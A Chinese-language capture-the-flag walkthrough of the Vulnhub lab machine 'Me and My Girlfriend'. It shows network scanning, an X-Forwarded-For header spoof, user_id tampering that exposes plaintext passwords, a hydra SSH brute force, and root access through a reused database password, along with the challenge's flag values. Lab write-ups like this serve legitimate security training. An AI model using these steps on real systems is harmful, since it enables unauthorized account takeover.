Vulnhub之Me and Mygirlfriend详细测试过程
Me and Mygirlfriend
作者:jason huawen
靶机信息
名称: Me and My Girlfriend: 1
地址:
https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:61:8a:f1 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:87:26:b3 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57e15658460433563dc34ba793ee2316 (DSA)
| 2048 3b264de4a03bf875d96e1555828c7197 (RSA)
| 256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
|_ 256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->
站点只能从本地访问,而且提示是在请求头中设置x-forwarded-for
可以用burpsuite拦截请求,然后增加x-forwarded-for:127.0.0.1
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/robots.txt
User-Agent: *
Allow: /heyhoo.txt
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ curl http://192.168.56.254/heyhoo.txt
Great! What you need now is reconn, attack and got the shell
此时成功得到页面:
不过用Burpsuite每次修改请求比较麻烦,可以用浏览器的插件IP,伪装X-Forwarded-For字段
从URL来看,是否会存在本地文件包含漏洞?
http://192.168.56.254/index.php?page=login
但经过测试,没有得到任何返回,不过也没有报错
用PHP filter也没有成功
http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
用burpsuite拦截请求,并将请求存储为文件,然后用sqlmap扫描,看是否存在SQL注入漏洞?
(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ sqlmap -r req.txt --level=5
SQLMAP并没有发现出SQL注入漏洞。
接下来注册一个用户test,看有什么发现?以test用户登录后
注意这里的URL:
http://192.168.56.254/index.php?page=dashboard&user_id=14
我们看是否可以通过修改user_id值进行水平攻击
当修改user_id=1时,查看profile
注意此时查看页面源代码,竟然有用户的明文密码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Ceban Corp</title>
<style>
.center {
text-align: center;
}
</style>
</head>
<body>
<div class="center">
<h2>Welcome To Ceban Corp</h2>
<p>Inspiring The People To Great Again!</p>
<hr>
<p><a href="?page=dashboard">Dashboard</a> | <a href="?page=profile&user_id=14">Profile</a> | <a href="?page=logout">Logout</a></p>
<hr>
</div>
<form action="#" method="POST">
<label for="name">Name</label>
<input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
<label for="username">Username</label>
<input type="text" name="username" id="username" value="eweuhtandingan"><br>
<label for="password">Password</label>
<input type="password" name="password" id="password" value="skuyatuh"><br>
<button disabled="disabled">Change</button>
</form>
</body>
</html>
那该用户名和密码是否也是SSH的用户名和密码?但发现不成功,可以将所有的用户的用户名和密码都收集起来:(即依次将user_id枚举从1到没有返回内容为止)
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh eweuhtandingan@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
eweuhtandingan@192.168.56.254's password:
Permission denied, please try again.
eweuhtandingan@192.168.56.254's password:
──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat users.dict
eweuhtandingan
aingmaung
sundatea
sedihaingmah
alice
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ cat pass.dict
skuyatuh
qwerty!!!
indONEsia
cedihhihihi
4lic3
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.56.254:22/
[22][ssh] host: 192.168.56.254 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
└─$ ssh alice@192.168.56.254
alice@192.168.56.254's password:
Last login: Fri Dec 13 14:48:25 2019
alice@gfriEND:~$ id
uid=1000(alice) gid=1001(alice) groups=1001(alice)
alice@gfriEND:~$ ls -alh
total 32K
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 6 root root 4.0K Dec 13 2019 ..
-rw------- 1 alice alice 10 Dec 13 2019 .bash_history
-rw-r--r-- 1 alice alice 220 Dec 13 2019 .bash_logout
-rw-r--r-- 1 alice alice 3.6K Dec 13 2019 .bashrc
drwx------ 2 alice alice 4.0K Dec 13 2019 .cache
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .my_secret
-rw-r--r-- 1 alice alice 675 Dec 13 2019 .profile
alice@gfriEND:~$ cat .bash_history
exit
exit
alice@gfriEND:~$ cd .my_secret/
alice@gfriEND:~/.my_secret$ ls -alh
total 16K
drwxrwxr-x 2 alice alice 4.0K Dec 13 2019 .
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 ..
-rw-r--r-- 1 root root 306 Dec 13 2019 flag1.txt
-rw-rw-r-- 1 alice alice 119 Dec 13 2019 my_notes.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
alice@gfriEND:~/.my_secret$ cat my_notes.txt
Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
alice@gfriEND:~/.my_secret$ cd /home
alice@gfriEND:/home$ ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
drwxr-xr-x 2 aingmaung aingmaung 4.0K Dec 13 2019 aingmaung
drwxr-xr-x 4 alice alice 4.0K Dec 13 2019 alice
drwxr-xr-x 2 eweuhtandingan eweuhtandingan 4.0K Dec 13 2019 eweuhtandingan
drwxr-xr-x 2 sundatea sundatea 4.0K Dec 13 2019 sundatea
至此得到了第一Flag.
提权
alice@gfriEND:/var/www/html$ cd config
alice@gfriEND:/var/www/html/config$ ls -alh
total 12K
drwxrwxr-x 2 root root 4.0K Dec 13 2019 .
drwxr-xr-x 5 root root 4.0K Dec 13 2019 ..
-rw-rw-r-- 1 root root 88 Dec 13 2019 config.php
alice@gfriEND:/var/www/html/config$ cat config.php
<?php
$conn = mysqli_connect('localhost', 'root', 'ctf_pasti_bisa', 'ceban_corp');
alice@gfriEND:/var/www/html/config$ su - root
Password:
root@gfriEND:~# cd /root
root@gfriEND:~# ls -alh
total 32K
drwx------ 3 root root 4.0K Dec 13 2019 .
drwxr-xr-x 22 root root 4.0K Dec 13 2019 ..
-rw------- 1 root root 0 Dec 13 2019 .bash_history
-rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc
drwx------ 2 root root 4.0K Dec 13 2019 .cache
-rw-r--r-- 1 root root 1000 Dec 13 2019 flag2.txt
-rw------- 1 root root 238 Dec 13 2019 .mysql_history
-rw------- 1 root root 81 Dec 13 2019 .nano_history
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@gfriEND:~# cat flag2.txt
________ __ ___________.__ ___________.__ ._.
/ _____/ _____/ |_ \__ ___/| |__ ____ \_ _____/| | _____ ____| |
/ \ ___ / _ \ __\ | | | | \_/ __ \ | __) | | \__ \ / ___\ |
\ \_\ ( <_> ) | | | | Y \ ___/ | \ | |__/ __ \_/ /_/ >|
\______ /\____/|__| |____| |___| /\___ > \___ / |____(____ /\___ /__
\/ \/ \/ \/ \//_____/ \/
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
root@gfriEND:~#
至此得到了root shell和root flag.本靶机提权部分比较简单,只要细心点,就可以找到配置漏洞。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
